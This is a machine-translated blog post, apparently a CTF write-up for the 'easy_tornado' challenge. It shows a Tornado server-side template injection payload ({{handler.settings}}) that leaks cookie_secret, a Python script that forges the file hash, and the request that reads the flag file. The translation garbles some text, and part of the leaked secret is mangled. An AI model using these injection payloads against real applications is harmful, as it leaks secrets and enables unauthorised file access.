当前位置:网站首页>Vulnerability recurrence easy_ tornado
Vulnerability recurrence easy_ tornado
2022-07-07 08:10:00 【_ s1mple】
[ Environmental Science ]
windows
[ Tools ]
Firefox
[ step ]
tornado yes python One of them web Application framework .
Got the title and found three documents :
flag.txt
/flag.txt
flag in /fllllllllllllagFind out flag stay /fllllllllllllag In the document ;
welcome.txt
/welcome.txt
renderrender yes python A rendering function in , Render variables into the template , That is, different pages can be formed by passing different parameters .
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))filehash=md5(cookie_secret+md5(filename)) Now? filename=/fllllllllllllag, Just need to know cookie_secret Can access flag.
After the test, I found another one error Interface , The format is /error?msg=Error, It is suspected that there is a server-side template injection attack (SSTI)
Try /error?msg={ {datetime}} stay Tornado In the front-end page template ,datetime It's pointing python in datetime This module ,Tornado Some object aliases are provided to quickly access objects , You can refer to Tornado Official documents
Find... By looking up the documentation cookie_secret stay Application object settings Properties of the , Also found that self.application.settings There's an alias
RequestHandler.settings
An alias for self.application.settings.handler To handle the current page RequestHandler object , RequestHandler.settings Point to self.application.settings, therefore handler.settings Point to RequestHandler.application.settings.
structure payload obtain cookie_secret
/error?msg={
{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'Calculation filehash value :
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
print(md5(cookie_secret+md5(filename)))
if __name__ == '__main__':
filehash()payload:
file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))Succeed in getting flag.
边栏推荐
- Force buckle 144 Preorder traversal of binary tree
- Complex network modeling (I)
- 快解析内网穿透助力外贸管理行业应对多种挑战
- JS quick start (I)
- Recursive construction of maximum binary tree
- Network learning (III) -- highly concurrent socket programming (epoll)
- 芯片 設計資料下載
- C语言二叉树与建堆
- Merging binary trees by recursion
- [quick start of Digital IC Verification] 17. Basic grammar of SystemVerilog learning 4 (randomization)
猜你喜欢
Game attack and defense world reverse
漏洞复现-Fastjson 反序列化
运放电路的反馈电阻上并联一个电容是什么作用
These five fishing artifacts are too hot! Programmer: I know, delete it quickly!
Linux server development, MySQL index principle and optimization
追风赶月莫停留,平芜尽处是春山
Force buckle 145 Binary Tree Postorder Traversal
LeetCode简单题之字符串中最大的 3 位相同数字
game攻防世界逆向
青龙面板-今日头条
随机推荐
Linux server development, MySQL index principle and optimization
JS复制图片到剪切板 读取剪切板
Empire CMS collection Empire template program general
The largest 3 same digits in the string of leetcode simple question
Find the mode in the binary search tree (use medium order traversal as an ordered array)
Recursive construction of maximum binary tree
Summary of redis functions
Game attack and defense world reverse
复杂网络建模(一)
基于Pytorch 框架手动完成线性回归
Search for an element in a binary search tree (BST)
Binary tree and heap building in C language
Leetcode 90: subset II
Few shot Learning & meta learning: small sample learning principle and Siamese network structure (I)
ROS bridge notes (05) - Carla_ ackermann_ Control function package (convert Ackermann messages into carlaegovehiclecontrol messages)
Complete linear regression manually based on pytoch framework
Es FAQ summary
Make LIVELINK's initial pose consistent with that of the mobile capture actor
Qinglong panel -- Huahua reading
Padavan manually installs PHP